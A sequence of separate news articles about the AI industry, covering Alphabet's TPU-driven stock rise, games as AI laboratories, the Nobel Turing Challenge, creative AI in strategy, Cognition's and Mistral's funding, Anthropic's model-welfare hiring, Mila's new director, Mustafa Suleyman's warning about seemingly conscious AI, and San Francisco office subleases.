Alphabet Inc. (NASDAQ: GOOG) shares climbed 2.1% on Friday, November 28, 2025, as retail sentiment surged to 64 (bullish) while NVIDIA Corporation (NASDAQ: NVDA) sentiment dropped to 33 (bearish). The catalyst: reports that Meta Platforms Inc. (NASDAQ:META) is in advanced talks to spend billions on Google’s TPU chips instead of NVIDIA’s GPUs, triggering discussion about the first real crack in NVIDIA’s dominance.
On r/stocks, user One-Blacksmith-4654 captured investor confusion in a post that drew 734 upvotes: “Alphabet suddenly ripping toward a multi-trillion valuation and Nvidia losing a massive chunk of market cap even though demand for GPUs is supposedly still sky-high…none of this lines up with the narratives we were all trading on earlier this year.”
A detailed analysis on r/StockMarket noted that “after reports came out that Meta is in advanced talks to spend billions on Google’s AI chips instead of Nvidia’s, the company actually put out a statement defending its market position. That rarely happens.” NVIDIA’s stock shed roughly $250B in market value while Alphabet shares jumped as Wall Street recognized TPUs as a legitimate alternative.
Three factors drive the bullish case:
Google TPUs are 2x cheaper than NVIDIA GPUs at standard 9,000-chip rack configurations, per semiconductor research cited on r/wallstreetbets
Potential TPU customers could represent up to 10% of NVIDIA’s annual revenue, per The Information
A Google DeepMind TPU engineer stated on X that the market is “clueless about hardware and the demand” following NVIDIA’s sell-off. The comment, shared widely on r/StockMarket with 436 upvotes, emphasized that AI hardware demand remains consistently high despite stock volatility.
Alphabet’s RSI hit 73.73 on November 28, maintaining overbought levels above 70 for the past week. The stock trades near its 52-week high of $328.67, up 131% from its November 2024 low of $142.36. With market cap exceeding $3.86T and Google Cloud revenue growing 34% year-over-year to $15.2B, fundamentals support the technical breakout. Watch for TPU customer wins and any competitive response from NVIDIA as this hardware battle intensifies.
With games teaching models to act, the future of creative technology is being prototyped in virtual worlds. Unsplash+
When Electronic Arts (EA) announced its partnership with Stability AI, it promised more than slicker workflows in game development. The announcement confirmed that video games are evolving into the world’s most dynamic laboratory for artificial intelligence. The truth is, what happens in gaming today often sets the cultural and technical standards for every other creative field tomorrow. For decades, creative revolutions followed their tools. Cameras gave rise to cinema. Synthesizers redefined sound. Game engines turned code into story. Now generative A.I. is the next medium, and the engineers designing its frameworks are shaping how imagination itself gets scaled.
Why gaming leads the way
Games bring together physics, narrative and design inside interactive systems that mimic the complexity of real life. They are, in effect, real-time simulations of cause and effect. A.I. needs games as much as games need A.I. A model trained within a game world learns context, decision-making and feedback loops that are far richer than static datasets can offer. Simulated interactive environments have been shown to dramatically accelerate multi-agent coordination, behavioral prediction and synthetic data generation. From DeepMind’s AlphaStar learning strategy inside StarCraft II to the recent wave of experiments in Minecraft-based agent learning, games have already become benchmark environments for reasoning and planning.
When EA describes its goal as building “systems that can previsualize entire 3D environments from a few prompts,” it signals more than a productivity upgrade. It frames a new design philosophy. If models can generate, analyze and iterate at scale, developers begin to function less like sketch artists and more like orchestra conductors. Humans define intent; models execute infinite variations.
The new creative hierarchy
This shift points to a deeper cultural truth. Influence no longer lies solely with artists or storytellers but increasingly with those who design the systems of creation. A new breed of “meta-creators” emerges: engineers and architects shaping the boundaries within which others build. Their code becomes the stage; their parameters, the palette.
In gaming, this transformation is visible: the player, the developer and now the model all share authorship. The economic data underlines this shift, too: the generative A.I. in gaming market is projected to exceed $4.13 billion in 2029, a compound annual growth rate (CAGR) of 23.2 percent—a pace rivaling the early mobile-gaming boom.
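As a back-of-envelope check on that figure (a sketch only, assuming the compounding window runs 2025 through 2029; the report’s base year isn’t stated here):

$$
V_{2029} = V_{\text{base}}\,(1+r)^{n}
\quad\Longrightarrow\quad
V_{\text{base}} = \frac{\$4.13\text{B}}{(1.232)^{4}} \approx \$1.79\text{B}
$$

In other words, a 23.2 percent CAGR implies a market a bit under $1.8 billion at the start of that window, more than doubling over four years.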
But the numbers only tell part of the story. What matters more is the creative literacy being formed inside these ecosystems. Millions of gamers, modders and indie developers are learning to collaborate with algorithms as peers, not just tools.
From content-economy to framework-economy
I often frame this transition as the move from a content economy to a framework economy. Historically, value sat in the final output—games, films, assets. However, value no longer resides solely in what’s produced, but in what enables production at scale: engines, toolkits, A.I. pipelines and structured worlds. Unreal Engine’s ascent from a shooter-specific engine to the backbone of architecture, automotive design and Hollywood virtual production is the clearest precedent. The same principle extends to A.I.: whoever builds the scaffolding of imagination—foundation models, simulation layers, constraint systems—shapes the flow of creativity across industries.
The implications reach far beyond entertainment. Game engines already power architectural visualization, advanced robotics simulations, digital twins for urban planning and surgical training environments. As A.I. models learn inside those interactive systems, they gain an embodied understanding of spatial logic and cause-and-effect. A recent paper, for example, presents a framework that generates action-controllable game videos via open-domain diffusion models, an early step toward agents that can “understand” environments rather than just render them. In other words, games teach machines not just to see, but to act.
The boundary between play and progress blurs
The same physics engine that governs a racing game can teach an autonomous vehicle to respond to real-world variables. The same dialogue system that trains NPCs to interact can be repurposed for virtual educators or A.I. companions. Every advance in player immersion is also an advance in machine intuition.
Yet, a cultural reckoning is unfolding. If frameworks become the new frontier of creation, who governs them? The promise of democratization could just as easily turn into concentration, where a few corporations set the parameters of imagination itself—its physics, its cultural defaults. Without deliberate design, “democratized creativity” could turn into centralized control over the engines of imagination. The task ahead is to keep the sandbox open: design architectures where creativity remains decentralized, auditable and human-aligned.
Human intent remains vital
That doesn’t mean resisting automation. It means defining it ethically. Games have always been rule-based systems with feedback loops, essentially laboratories of governance. They show us how to balance structure and freedom, how to create environments that encourage exploration without chaos. These are precisely the principles we need as we integrate A.I. into broader creative and industrial workflows.
When EA says humans will stay “at the center of storytelling,” it isn’t nostalgic; it’s a necessity. Models can approximate texture, light and tone, but they still can’t dream or empathize. The human imagination remains the compass even as the landscape changes. The creative act is not solitary anymore; it’s a dialogue between cognition and computation.
What’s striking is how natural this feels to a generation raised inside interactive worlds. For them, co-creation with algorithms isn’t a threat but a mode of play. They already understand the interplay between rules and imagination, constraints and emergent behavior. This is the generation that will design how A.I. creates.
The rehearsal space for the next creative era
Through this lens, gaming becomes the rehearsal space for the next century of creativity. Every tool first tested in virtual worlds—procedural generation, emotion-aware agents, adaptive simulations—will migrate into film, architecture, education and governance. Games remain humanity’s most advanced simulation of itself, and now they’re teaching our machines how to imagine, interact and build alongside us.
So when we talk about the future of A.I., perhaps we shouldn’t look to labs or boardrooms but to game studios, modding forums and virtual worlds where the next breakthroughs are quietly being debugged. That’s where intelligence learns empathy, context and play. And that’s where the next renaissance of creativity is already underway.
Hiroaki Kitano launched the Nobel Turing Challenge back in 2016. Courtesy Sony Computer Science Laboratories
For more than a century, early October has marked the arrival of Nobel Prize announcements recognizing achievements across sciences, literature and peace. Recipients vary by nationality, age and gender but share one thing in common: they’re human. That could change in the coming decades if the team behind the Nobel Turing Challenge succeeds.
Launched in 2016 by Japanese scientist Hiroaki Kitano, the challenge aims to spur the creation of an autonomous A.I. system capable of making a Nobel Prize-worthy discovery by 2050. Kitano was inspired to start the endeavor after concluding that progress in complex fields like systems biology might eventually require an A.I. scientist or A.I.-human hybrid. “After 30 years of research, I realized that biological systems may be too complex and vast and overwhelm human cognitive capabilities,” Kitano told Observer.
Kitano has long worked at the intersection of science and machine learning. In the 1980s and early 1990s, he researched A.I. systems at Carnegie Mellon University. More recently, he served as the chief technology officer of Sony Group Corporation from 2022 to 2024 and now holds the title of chief technology fellow. He’s also CEO of Sony Computer Science Laboratories, a unit focused on cutting-edge research.
The broader science community initially greeted the Nobel Turing Challenge with a mix of excitement and skepticism. This didn’t faze Kitano, who faced similar reactions in 1993 when he co-founded RoboCup, an international robotics competition challenging developers to build a robotic football team capable of defeating the best human players by 2050.
“Any grand challenge will face such mixed reactions,” he said. “Otherwise, it is not challenging enough.”
Today, Kitano’s goal seems less far-fetched. A.I. already plays a growing role in the work of recent Nobel Prize winners—albeit with human oversight. Last year, the Nobel Prize in Physics went to A.I. researchers Geoffrey Hinton and John Hopfield for their contributions to neural network training. Two of last year’s Chemistry laureates, Google DeepMind’s Demis Hassabis and John Jumper, were recognized for developing AlphaFold, an A.I. model that predicts protein structures.
The Nobel Turing Challenge has two main objectives. First, an A.I. system must autonomously handle every stage of scientific research: defining questions, generating hypotheses, planning and executing experiments, and forming new questions based on the results. Second, in a nod to the Turing test, the challenge aims to see whether such an A.I. scientist could perform so convincingly that peers—and even the Nobel Prize selection committee—would not realize it’s a machine.
Kitano believes A.I. is most likely to earn a Nobel Prize in physiology or medicine, chemistry, or physics, but he admits there’s still a long way to go despite rapid progress in recent years. Creating a system capable of generating large-scale hypotheses and running fully automated robotic experiments remains a formidable challenge. “We are in the early stage of the game,” he said.
Still, the challenge’s stated goal—to have an A.I. win a Nobel Prize—isn’t technically possible. The awards, established in 1895 through the will of inventor Alfred Nobel, can only be granted to a living person, organization or institution. Even so, Kitano hopes his initiative might eventually influence how the Nobel committees make decisions.
“I think if [the] Nobel committee created an internal rule to check if the candidate is human or A.I. before the award decision, that would be our win.”
When algorithms start to imagine, human decision-making enters uncharted territory. Unsplash+
In boardrooms, creativity is often conflated with charisma—a founder’s flash of insight, a strategist’s “feel” for the market. The rise of creative A.I. complicates that mythology. Systems that once mimicked patterns are beginning to originate them, not by feeling their way through ambiguity, but by searching vast spaces of possibilities with tireless composure. The question for leadership is no longer whether A.I. can imitate the past. It is whether machines can meaningfully extend the frontier of invention—and how executives should organize decision-making when they do.
From imitation to invention
The cleanest evidence that A.I. is stepping past imitation arrives where truth is checkable: mathematics, molecular science and materials discovery.
In 2022, DeepMind’s AlphaTensor discovered new, provably correct matrix multiplication algorithms that improved on long-standing human results for various matrix sizes. That is not style transfer; it is algorithmic invention in a domain where proof, not opinion, decides progress.
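To make the result concrete, here is what a faster matrix multiplication algorithm looks like in miniature: a sketch of Strassen’s 1969 construction, the classic human baseline against which AlphaTensor’s discoveries are measured. It multiplies 2×2 matrices with seven scalar multiplications instead of the naive eight, a saving that compounds when the trick is applied recursively to matrix blocks. (The Python below is an illustrative sketch, not AlphaTensor’s output.)

```python
# Strassen's 1969 algorithm for 2x2 matrices: 7 multiplications instead of 8.
# Applied recursively to blocks, the saving compounds; AlphaTensor searched
# for (and found) schemes of this kind with even fewer multiplications.

def strassen_2x2(a, b):
    """Multiply two 2x2 matrices (nested lists) with 7 scalar multiplications."""
    (a11, a12), (a21, a22) = a
    (b11, b12), (b21, b22) = b

    m1 = (a11 + a22) * (b11 + b22)
    m2 = (a21 + a22) * b11
    m3 = a11 * (b12 - b22)
    m4 = a22 * (b21 - b11)
    m5 = (a11 + a12) * b22
    m6 = (a21 - a11) * (b11 + b12)
    m7 = (a12 - a22) * (b21 + b22)

    return [[m1 + m4 - m5 + m7, m3 + m5],
            [m2 + m4, m1 - m2 + m3 + m6]]

# Sanity check against the naive 8-multiplication result.
assert strassen_2x2([[1, 2], [3, 4]], [[5, 6], [7, 8]]) == [[19, 22], [43, 50]]
```

The point is that correctness here is a matter of proof, not taste: any proposed scheme either reproduces the product exactly or it does not.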
In late 2023, an A.I. system known as GNoME proposed 2.2 million crystal structures and identified roughly 381,000 as stable, nearly an order-of-magnitude expansion of the known “materials possibility space.” Labs have already begun synthesizing candidates for batteries and semiconductors, creating a faster loop between computational hypothesis and physical validation.
In 2024, AlphaFold 3 advanced from single-protein structure prediction to modeling interactions among proteins, nucleic acids and small molecules. This capability matters for drug design because binding, not just shape, drives efficacy. The model’s accuracy on complex assemblies has energized pharmaceutical R&D, though access limits have drawn pushback from academics who want open tools.
Progress is also visible in symbolic reasoning. DeepMind has reported systems that solve International Mathematical Olympiad problems at the level of a silver medalist. At the same time, the research community continues to explore machine-generated conjectures, including the “Ramanujan Machine” work on fundamental constants.
None of this makes A.I. creative in the human sense. It does, however, expand the adjacent possible, surfacing options that were invisible or unaffordable to explore manually. When machines push frontiers in domains with crisp feedback—proofs or measured properties—boards should treat them not as autocomplete engines, but as option-generation machines for strategy.
A more recent wave of “reasoning models” underscores the shift. OpenAI’s “o” line prioritizes deliberate chains of thought and planning over fast pattern matching, improving performance on mathematics and coding tasks. Whatever the brand names, the direction of travel is clear: more search, more planning, more verifiable problem-solving—and less reliance on past style to predict the future.
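In schematic form, the pattern behind these systems is generate-and-verify: propose many candidates, keep only those an independent checker accepts. The toy below, which searches for Pythagorean triples, is an invented stand-in; a real verifier would be a proof checker or a unit-test suite, and a real proposer would be a model rather than a brute-force enumerator.

```python
# Generate-and-verify in miniature: a proposer emits candidates, a crisp
# checker accepts or rejects them. The task (Pythagorean triples) is a toy
# stand-in for domains with verifiable truth signals, such as proofs or tests.
import itertools

def propose():
    """Stand-in for a model sampling candidate answers."""
    yield from itertools.product(range(1, 30), repeat=3)

def verify(candidate):
    """Crisp, checkable truth signal: accept only genuine triples."""
    a, b, c = candidate
    return a < b < c and a * a + b * b == c * c

solutions = [cand for cand in propose() if verify(cand)]
print(solutions[:3])  # [(3, 4, 5), (5, 12, 13), (6, 8, 10)]
```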
What machines still cannot feel
Creativity at the level that moves markets also rests on three human anchors:
Intuition: tacit pattern recognition shaped by lived experience and domain immersion.
Emotion: the energy to pick a fight with the status quo, to persist when the spreadsheet says “no.”
Cultural context: sensitivity to norms, taste and symbolism that gives an idea social traction.
A.I. can simulate tone and recall cultural references. Still, it has no stake in the outcome and no phenomenology—no gut to trust, no fear to overcome, no values to defend. That absence is evident in strategy, where the “right” move hinges on timing, narrative and coalition-building as much as on optimization.
The practical stance, therefore, is not man versus machine, but machine-extended human judgment. Executives should treat creative A.I. as a means to broaden the search over hypotheses and prototypes, then apply human judgment, ethics and narrative sense to decide which bets to place and how to mobilize organizations around them.
How leaders should exploit machine invention—without outsourcing judgment
1) Run invention portfolios, not tool pilots. The AlphaTensor and GNoME results serve as reminders that A.I.’s edge lies in search. Build portfolios where models explore thousands of algorithmic or design candidates in parallel, with clear funnels for lab validation or market testing. Resist vanity pilots; instrument programs like a venture portfolio with kill criteria, milestone economics and fast capital recycling.
2) Separate generation from selection. Let models overgenerate options; reserve selection for cross-functional councils that combine domain experts with brand, legal and policy voices. In drug discovery, for example, computational signals are necessary, but go-to-market narratives, regulatory risk and patient trust still decide value. AlphaFold 3’s critics highlight that access and transparency are strategic variables, not just technical ones.
3) Put proof and measurement at the core. Favor use cases with verifiable feedback, such as proofs, A/B tests and measurable properties, before pushing into messier cultural domains (a minimal A/B-test check is sketched after this list). The faster the loop from hypothesis to truth signal, the more compounding advantage you build. That is why material and algorithm discovery have progressed rapidly, while brand-level creativity remains a human-led endeavor.
4) Couple A.I. with automated execution. The materials ecosystem illustrates the compounding effect when A.I. designs are paired with automated synthesis and testing. The playbook for enterprises is similar: link generative systems to simulation, robotic process automation or programmatic experimentation to prevent ideas from dying in slide decks.
5) Govern for explainability where it matters—and for outcomes where it doesn’t. Demand explanations in regulated or safety-critical contexts. Elsewhere, prioritize outcomes with robust testing and guardrails. AlphaTensor’s value lies in proofs; a marketing concept’s value lies in performance lift, not in the model’s narrative about why it works.
6) Incentivize “taste” as a strategic moat. As models make it cheap to generate competent options, advantage shifts to taste—the human ability to recognize what resonates in a culture. Recruit and reward this scarce judgment. Machines can propose; only leaders can pick the hill to die on.
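As a concrete instance of the verifiable feedback favored in point 3, here is a minimal sketch of one such truth signal: a two-proportion z-test on a hypothetical A/B experiment. All counts are invented for illustration, and a disciplined program would also pre-register the metric, sample size and significance threshold in advance.

```python
# A minimal "truth signal" for an A/B test: a two-proportion z-test comparing
# conversion rates. Counts are hypothetical; real programs would pre-register
# the test design before peeking at results.
from math import sqrt, erf

def ab_test_z(conv_a, n_a, conv_b, n_b):
    """Return (absolute lift, two-sided p-value) for variant B vs. control A."""
    p_a, p_b = conv_a / n_a, conv_b / n_b
    pooled = (conv_a + conv_b) / (n_a + n_b)
    se = sqrt(pooled * (1 - pooled) * (1 / n_a + 1 / n_b))
    z = (p_b - p_a) / se
    # Two-sided tail probability under the standard normal distribution.
    p_value = 2 * (1 - 0.5 * (1 + erf(abs(z) / sqrt(2))))
    return p_b - p_a, p_value

lift, p = ab_test_z(conv_a=480, n_a=10_000, conv_b=540, n_b=10_000)
print(f"lift={lift:.4f}, p={p:.3f}")  # act on the variant only if the signal holds
```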
What this means for decision-making
The companies that convert creative A.I. into a durable advantage will do three things differently.
Treat search as a first-class strategic function. Leaders will invest in compute, data and optimization talent the way prior generations invested in distribution—because the ability to search better than competitors becomes a compounding differentiator in R&D, pricing, logistics and design.
Reframe “intuition” as a disciplined interface. Human intuition does not retire; it selects, sequences and gives narrative shape to the outputs of machine search. That interface needs structure: pre-registered criteria, red-team rituals, ethical review and explicit narrative strategy.
Professionalize uncertainty. Creative A.I. expands the option set and the error surface. Governance must evolve from model-centric compliance to portfolio-centric risk control, with exposure limits, scenario triggers and graceful rollback plans. The lesson from AlphaFold 3’s access debate is that licensing, openness and ecosystem design are themselves strategic levers, not afterthoughts.
The bottom line is not that machines have acquired emotions or culture. They have acquired something strategically scarce: the capacity to search, prove and propose at superhuman scale in domains where claims can be checked against ground truth. That capability does not substitute for human attributes; it amplifies them. The winning organizations will be those that marry machine-scale exploration with human-grade selection, treating A.I. neither as a muse nor as a mask, but as the most relentless research partner strategy has ever had.
Peter Thiel’s Founders Fund led Cognition’s latest $400 million funding round. Photo by Nordin Catic/Getty Images for The Cambridge Union
Cognition AI, the San Francisco-based startup known for Devin, an A.I. software engineer used by Goldman Sachs, has more than doubled its valuation to $10.2 billion after raising more than $400 million in a round led by Peter Thiel’s Founders Fund. The deal, announced yesterday (Sept. 8), also drew participation from existing backers including angel investor Elad Gil, Lux Capital, 8VC, Neo, Definition Capital and Swish VC. The fresh financing marks a sharp increase from the $4 billion valuation Cognition received earlier this year.
Cognition was launched in 2023 by Scott Wu, Steven Hao and Walden Yang. Wu, the company’s CEO, previously co-founded Lunchclub, an A.I. networking platform. The founding team also includes alumni of Scale AI, Google DeepMind and self-driving software maker Waymo, as well as a number of elite coders who medaled at the International Olympiad in Informatics, a global programming competition.
Cognition’s flagship product is Devin, an A.I. software engineer. The company has also made waves through acquisitions, most notably when it snapped up software firm Windsurf just days after Google hired away much of its leadership. OpenAI had reportedly pursued Windsurf, but the deal fell apart over complications with OpenAI’s partner Microsoft; in July, Google struck a multibillion-dollar licensing deal for Windsurf’s technology and acqui-hired several top staffers. Cognition then acquired what remained of the company: its team, intellectual property and product.
Even before the Windsurf deal, Cognition’s annual recurring revenue (ARR) had climbed rapidly—from $1 million in September 2024 to $73 million by this June, Wu said in a press release. Since the acquisition, ARR has more than doubled. “We’ll continue to invest significantly in both Devin and Windsurf, and our customers are already seeing how powerful the combination is together,” Wu added, noting that clients include Goldman Sachs, Dell and Palantir.
Looking ahead, Cognition plans to expand the ways its users can leverage the combined power of Devin and Windsurf. “We’re looking forward to enabling engineers [to] manage an army of agents to build technology faster,” said Jeff Wang, Windsurf’s interim CEO since former leader Varun Mohan departed for Google, in a LinkedIn post. “It’s been quite an eventful last few months, and now it’s time to show what we’re made of.”
A.I. startup Anthropic is best known for its Claude chatbot. Courtesy Anthropic
Last year, Anthropic hired its first-ever A.I. welfare researcher, Kyle Fish, to examine whether A.I. models are conscious and deserving of moral consideration. Now, the fast-growing startup is looking to add another full-time employee to its model welfare team as it doubles down on efforts in this small but burgeoning field of research.
The question of whether A.I. models could develop consciousness—and whether the issue warrants dedicated resources—has sparked debate across Silicon Valley. While some prominent A.I. leaders warn that such inquiries risk misleading the public, others, like Fish, argue that it’s an important but overlooked area of study.
“Given that we have models which are very close to—and in some cases at—human-level intelligence and capabilities, it takes a fair amount to really rule out the possibility of consciousness,” said Fish on a recent episode of the 80,000 Hours podcast.
Anthropic recently posted a job opening for a research engineer or scientist to join its model welfare program. “You will be among the first to work to better understand, evaluate and address concerns about the potential welfare and moral status of A.I. systems,” the listing reads. Responsibilities include running technical research projects and designing interventions to mitigate welfare harms. The salary for the role ranges between $315,000 and $340,000.
Anthropic did not respond to requests for comment from Observer.
The new hire will work alongside Fish, who joined Anthropic last September. He previously co-founded Eleos AI, a nonprofit focused on A.I. wellbeing, and co-authored a paper outlining the possibility of A.I. consciousness. A few months after Fish’s hiring, Anthropic announced the launch of its official research program dedicated to model welfare and interventions.
As part of this program, Anthropic recently gave its Claude Opus 4 and 4.1 models the ability to exit user interactions deemed harmful or abusive, after observing “a pattern of apparent distress” during such exchanges. Instead of being forced to remain in these conversations indefinitely, the models can now end communications they find aversive.
For now, the bulk of Anthropic’s model welfare interventions will remain low-cost and designed to minimize interference with user experience, Fish told 80,000 Hours. He also hopes to explore how model training might raise welfare concerns and experiment with creating “some kind of model sanctuary”—a controlled environment akin to a playground where models can pursue their own interests “to the extent that they have them.”
Anthropic may be the most public major company investing in model welfare, but it’s not alone. In April, Google DeepMind posted an opening for a research scientist to explore topics including “machine consciousness,” according to 404 Media.
Still, skepticism persists in Silicon Valley. Mustafa Suleyman, CEO of Microsoft AI, argued last month that model welfare research is “both premature and frankly dangerous.” He warned that encouraging such work could fuel delusions about A.I. systems, and that the emergence of “seemingly conscious A.I.” could prompt calls for A.I. rights.
Fish, however, maintains that the possibility of A.I. consciousness shouldn’t be dismissed. He estimates a 20 percent chance that “somewhere, in some part of the process, there’s at least a glimmer of conscious or sentient experience.”
As Fish looks to expand his team with a new hire, he also hopes to broaden the scope of Anthropic’s welfare agenda. “To date, most of what we’ve done has had a flavor of identifying low-hanging fruit where we can find it and then pursuing those projects,” he said. “Over time, we hope to move more in the direction of really aiming at answers to some of the biggest-picture questions and working backwards from those to develop a more comprehensive agenda.”
CEO Arthur Mensch is steering Mistral away from the AGI hype and toward Europe’s A.I. sovereignty. Photo by Ludovic Marin/AFP via Getty Images
Paris-based Mistral AI is on track for a new funding round that would value the A.I. startup at 12 billion euros ($14 billion), Bloomberg reports. The investment, expected to total around 2 billion euros ($2.3 billion), would solidify the company’s position at the center of Europe’s sovereign A.I. strategy and bring it closer to its goal of challenging dominant U.S. rivals.
Founded in 2023, Mistral has already raised some 1.1 billion euros ($1.3 billion) over the past two years. Its upcoming valuation would more than double the 5.8 billion euros ($6.8 billion) figure it reached last June following a 468 million euro ($550 million) round that drew backers such as Andreessen Horowitz, Salesforce and Nvidia.
Mistral did not respond to requests for comment from Observer.
For now, the startup remains far smaller than its Silicon Valley competitors. Anthropic closed a round earlier this month at a staggering $183 billion valuation, while OpenAI is reportedly eyeing $500 billion. Still, Mistral is eager to compete. Its products include an A.I. assistant called “Le Chat,” designed for European customers and positioned as an alternative to OpenAI’s ChatGPT and Anthropic’s Claude chatbots.
Mistral was co-founded by Arthur Mensch, a former researcher at Google DeepMind, along with former Meta researchers Timothée Lacroix and Guillaume Lample. Mistral has tried to distinguish itself by emphasizing open access. It has released several open-source language models. Unlike American A.I. giants, Mistral has also rejected pursuing AGI. Mensch, who serves as CEO, has said his firm is more focused on ensuring U.S. startups don’t dominate how the technology shapes global culture.
Mistral is central to Europe’s A.I. playbook
Mistral is part of a broader surge in European A.I. investment. In 2024, venture capital rounds involving A.I. and machine learning companies based in Europe reached an estimated 13.2 billion euros ($15.5 billion), up 20 percent from 2023, according to PitchBook.
As one of Europe’s leading startups, Mistral is central to the region’s goal of building an A.I. ecosystem independent of technology from America or China. Earlier this year, the company partnered with Nvidia to launch a European A.I. platform that will allow companies to develop applications and strengthen domestic infrastructure. French President Emmanuel Macron hailed the initiative as “a game changer, because it will increase our sovereignty and it will allow us to do much more.”
Mistral’s rapid ascent is tied to broader efforts to bolster A.I. across Europe and France. Its Nvidia partnership followed Macron’s announcement at Paris’ global A.I. summit in February, where he pledged more than 100 billion euros ($117 billion) to support France’s A.I. industry. European players must move quickly, Macron stressed at the time: “We are committed to going faster and faster.”
Hugo Larochelle assumed his new role as head of Mila on Sept. 2. BENEDICTE BROCARD
Hugo Larochelle first caught the A.I. research bug after interning in the lab of Yoshua Bengio, a pioneering A.I. academic, during his undergraduate studies at the University of Montreal. Decades later, Larochelle is now succeeding his former mentor as the scientific director of Quebec’s Mila A.I. Institute, an organization known in the A.I. field for its deep learning research.
“My first mission is to maintain the caliber of our research and make sure we continue being a leading research institute,” Larochelle, who began his new role yesterday (Sept. 2), told Observer.
Larochelle will oversee some 1,500 machine learning researchers at Mila, which Bengio founded in 1993 as a small research lab. Today, the institute is a cornerstone of Canada’s national A.I. strategy alongside two other research hubs in Ontario and Alberta.
Larochelle “has the rigor, creativity and vision needed to meet Mila’s scientific ambitions and accompany its growth,” said Bengio, who left the institute to focus on a new A.I. safety venture he launched in June, in a statement. “Our collaboration goes back more than 20 years, and I am delighted to see it continue in a new form.”
After his early work with Bengio, Larochelle completed a postdoctoral fellowship under Geoffrey Hinton at the University of Toronto. Bengio, Hinton and Yann LeCun went on to win the 2018 Turing Award for their contributions to neural networks—a field once overlooked but now central to the A.I. revolution.
Larochelle’s own career reflects that shift. His first paper was rejected for relying on neural networks, but as their applications became clear, the field’s importance skyrocketed. “We felt like we were at the center of what’s important in the field, and that was exhilarating,” said Larochelle.
He went on to co-found Whetlab, a machine learning startup later acquired by Twitter (now X), before leading A.I. research at Google’s Montreal office in 2016. While most of his eight years at Google were highly productive, Larochelle noted that growing competition and a stronger focus on consumer products made publishing more difficult—a key factor in his decision to leave for Mila. “My passion was really scientific discovery, and simultaneously, I heard that Yoshua was going to find a successor,” he said.
In his new role, Larochelle wants to build on Montreal’s tradition of major scientific breakthroughs. “I want to set the condition that we make the next one in the next five years, and that’s really the foundation of everything else we do,” he said. He also highlighted interests in advancing A.I. literacy, developing tools for biodiversity and accelerating scientific research.
More broadly, Larochelle hopes to ensure that innovation moves faster—both across the industry and within Mila. “There’s definitely an interest in also making sure that our researchers, who might be interested in taking their own research and doing a startup based on what they’ve discovered, are well equipped in doing that,” he said.
Mustafa Suleyman joined Microsoft last year to head up its consumer A.I. efforts. Stephen Brashear/Getty Images
Will A.I. systems ever achieve human-like “consciousness”? Given the field’s rapid pace, the answer is likely yes, according to Microsoft AI CEO Mustafa Suleyman. In a new essay published yesterday (Aug. 19), he described the emergence of “seemingly conscious A.I.” (SCAI) as a development with serious societal risks. “Simply put, my central worry is that many people will start to believe in the illusion of A.I.s as conscious entities so strongly that they’ll soon advocate for A.I. rights, model welfare and even A.I. citizenship,” he wrote. “This development will be a dangerous turn in A.I. progress and deserves our immediate attention.”
Suleyman is particularly concerned about the prevalence of A.I.’s “psychosis risk,” an issue that’s picked up steam across Silicon Valley in recent months as users reportedly lose touch with reality after interacting with generative A.I. tools. “I don’t think this will be limited to those who are already at risk of mental health issues,” Suleyman said, noting that “some people reportedly believe their A.I. is God, or a fictional character, or fall in love with it to the point of absolute distraction.”
OpenAI CEO Sam Altman has expressed similar worries about users forming strong emotional bonds with A.I. After OpenAI temporarily cut off access to its GPT-4o model earlier this month to make way for GPT-5, users voiced widespread disappointment over the loss of the predecessor’s conversational and effusive personality.
Debates will only grow more complex as A.I.’s capabilities advance, according to Suleyman, who oversees Microsoft’s consumer A.I. products like Copilot. Suleyman co-founded DeepMind in 2010 and later launched Inflection AI, a startup largely absorbed by Microsoft last year.
Building an SCAI, Suleyman argues, will likely be possible in the coming years. To achieve the illusion of a human-like consciousness, A.I. systems will need language fluency, empathetic personalities, long and accurate memories, autonomy and goal-planning abilities—qualities that large language models (LLMs) already have or will soon acquire.
While some users may treat SCAI as a phone extension or pet, others “will come to believe it is a fully emerged entity, a conscious being deserving of real moral consideration in society,” said Suleyman. He added that “there will come a time when those people will argue that it deserves protection under law as a pressing moral matter.”
Some in the A.I. field are already exploring “model welfare,” a concept aimed at extending moral consideration to A.I. systems. Anthropic launched a research program in April to investigate model welfare and interventions. Earlier this month, the startup gave its Claude Opus 4 and 4.1 models the ability to end harmful or abusive user interactions after observing “a pattern of apparent distress” in the systems during certain conversations.
Encouraging principles like model welfare “is both premature, and frankly dangerous,” according to Suleyman. “All of this will exacerbate delusions, create yet more dependence-related problems, prey on our psychological vulnerabilities, increase new dimensions of polarization, complicate existing struggles for rights, and create a huge new category error for society.”
To prevent SCAIs from becoming commonplace, A.I. developers should avoid promoting the idea of conscious A.I.s and instead design models that minimize signs of consciousness or human empathy triggers. “We should build A.I. for people; not to be a person,” said Suleyman.
Ten years ago, Pear VC, then a tiny new venture firm, operated out of a nondescript office in Palo Alto that was enlivened by bright, computer-themed art. Last week, the outfit — which closed its largest fund to date in May — quietly inked a deal to sublease 30,000 square feet of “Class A” office space in San Francisco’s Mission Bay neighborhood from the file-storage giant Dropbox.
It’s among a number of fast-growing outfits taking up more space in San Francisco as an earlier generation of companies shrinks its physical footprint.
As the San Francisco Chronicle first reported last week, ChatGPT creator OpenAI just subleased two buildings totaling a collective 486,600 square feet from Uber. The ride-share giant, which originally leased a grouping of four buildings down the street from Dropbox and will continue to occupy two of these, told the paper it is “right-sizing.”
A rival to OpenAI — Anthropic — also just reportedly closed a sizable subleasing deal. Its plan: to take over the entire 250,000-square-foot building in downtown San Francisco that was previously Slack’s headquarters.
Salesforce, which acquired Slack in 2021, is an investor in Anthropic. Meanwhile, Pear VC co-founder Pejman Nozad wrote one of the first small checks to Dropbox when he was still relatively new to the U.S. from Iran and selling Persian rugs to Silicon Valley bigwigs.
Such subleases don’t necessarily begin with handshake deals, however. Asked whether he zeroed in on Pear’s new space owing to his connection to Dropbox, Nozad scoffs. The office — which has room for more than 200 desks, features more than 20 conference and call rooms, and has dedicated event space to host talks — “was a business deal for them,” says Nozad. “The founders were not involved. As you know, I sold rugs for 17 years, so I have some skills in negotiation,” he adds with a laugh.
Certainly, it’s a good time to strike a subleasing deal if you’re a well-funded company on the rise. According to Colin Yasukochi, an executive director at the commercial real estate services firm CBRE, subleases in prime areas like Mission Bay and the city’s Financial District currently range from $60 to $80 per square foot. The higher the floor and the more plentiful the amenities, the higher the price. Startups willing to take space with less than five years left on the original tenant’s lease can negotiate even better terms, since they’ll need to lease again somewhere else in the not-too-distant future. By comparison, office lease rates passed the $75 per square foot mark in September 2019, before the pandemic turned the city upside down.
